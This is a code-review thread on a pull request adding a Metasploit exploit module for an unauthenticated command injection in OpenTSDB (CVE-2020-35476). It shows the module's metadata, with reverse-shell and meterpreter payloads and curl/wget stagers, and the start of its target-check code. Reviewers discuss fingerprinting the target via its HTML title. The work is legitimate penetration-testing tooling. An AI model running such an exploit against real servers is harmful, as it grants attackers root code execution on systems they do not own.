modules/exploits/linux/http/opentsdb_yrange_cmd_injection.rb

```diff
@@ -0,0 +1,242 @@
+        info,
+        'Name' => 'OpenTSDB 2.4.0 unauthenticated command injection',
+        'Description' => %q{
+          This module exploits an unauthenticated command injection
+          vulnerability in the yrange parameter in OpenTSDB through
+          2.4.0 (CVE-2020-35476) in order to achieve unauthenticated
+          remote code execution as the root user.
+
+          The module first attempts to obtain the OpenTSDB version via
+          the api. If the version is 2.4.0 or lower, the module
+          performs additional checks to obtain the configured metrics
+          and aggregators. It then randomly selects one metric and one
+          aggregator and uses those to instruct the target server to
+          plot a graph. As part of this request, the yrange parameter is
+          set to the payload, which will then be executed by the target
+          if the latter is vulnerable.
+
+          This module has been successfully tested against OpenTSDB
+          version 2.3.0.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Shai rod', # @nightrang3r - discovery and PoC
+          'Erik Wynter' # @wyntererik - Metasploit
+        ],
+        'References' => [
+          ['CVE', '2020-35476'],
+          ['URL', 'https://github.com/OpenTSDB/opentsdb/issues/2051'] # disclosure and PoC
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 4242
+        },
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'CmdStagerFlavor' => %w[bourne curl wget],
+        'Targets' => [
+          [
+            'Automatic (Unix In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
+              'Type' => :unix_memory
+            }
+          ],
+          [
+            'Automatic (Linux Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            }
+          ]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2020-11-18',
+        'DefaultTarget' => 1,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options [
+      OptString.new('TARGETURI', [true, 'The base path to OpenTSDB', '/']),
+    ]
+  end
+
+  def check
+    # sanity check to see if the target is likely OpenTSDB
+    res1 = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    unless res1
+      return CheckCode::Unknown('Connection failed.')
+    end
+
+    unless res1.code == 200 && res1.body.include?('<title>OpenTSDB</title>')
```

Comment:
Not a blocker: This is a bit brittle, in the future it could be `<title>OpenTSDB Vx.y.z</title>` for instance.

Should we xpath the path and look for a substring instead maybe?

Example API used elsewhere:

```
            unless (node = res.get_html_document.xpath('//form//input[@name="_xsrf"]')).empty?
```

Reply:
@adfoster-r7 fair point. The full HTTP response on the target I tested was this:
```
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 998

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv=content-type content="text/html;charset=utf-8"><title>OpenTSDB</title>
<style><!--
body{font-family:arial,sans-serif;margin-left:2em}A.l:link{color:#6f6f6f}A.u:link{color:green}.fwf{font-family:monospace;white-space:pre-wrap}//--></style><script type=text/javascript language=javascript src=s/queryui.nocache.js></script></head>
<body text=#000000 bgcolor=#ffffff><table border=0 cellpadding=2 cellspacing=0 width=100%><tr><td rowspan=3 width=1% nowrap><img src=s/opentsdb_header.jpg><td>&nbsp;</td></tr><tr><td><font color=#507e9b><b></b></td></tr><tr><td>&nbsp;</td></tr></table><div id=queryuimain></div><noscript>You must have JavaScript enabled.</noscript><iframe src=javascript:'' id=__gwt_historyFrame tabIndex=-1 style=position:absolute;width:0;height:0;border:0></iframe><table width=100% cellpadding=0 cellspacing=0><tr><td class=subg><img alt="" width=1 height=6></td></tr></table></body></html>
```
I only now noticed the link to `opentsdb_header.jpg`, so I could include that. What do you think about this?
```suggestion
    unless res1.code == 200 && res1.body =~ /<title>OpenTSDB.*?<\/title>/ && res1.body.include?("opentsdb_header.jpg")
```

This would cover the scenario of the title being expanded to include a version or other info while still being reasonably string due to the jpg inclusion:
```
irb(main):013:0> title = "blablabla<title>OpenTSDB</title>blablabla"
=> "blablabla<title>OpenTSDB</title>blablabla"
irb(main):014:0> title2 = "blablabla<title>OpenTSDB 8.56</title>blablabla"
=> "blablabla<title>OpenTSDB 8.56</title>blablabla"
irb(main):015:0> title =~ /<title>OpenTSDB.*?<\/title>/
=> 9
irb(main):016:0> title2 =~ /<title>OpenTSDB.*?<\/title>/
=> 9
```

Reply:
As @adfoster-r7 suggested, I also think xpath would be the safest check and also the simplest:
```suggestion
    unless res1.code == 200 && res1.get_html_document.xpath('//title').text.include?('OpenTSDB')
```

Reply:
@cdelafuente-r7 thanks for the suggestion! I haven't done anything with xpath in a good while so this was helpful. I've added this now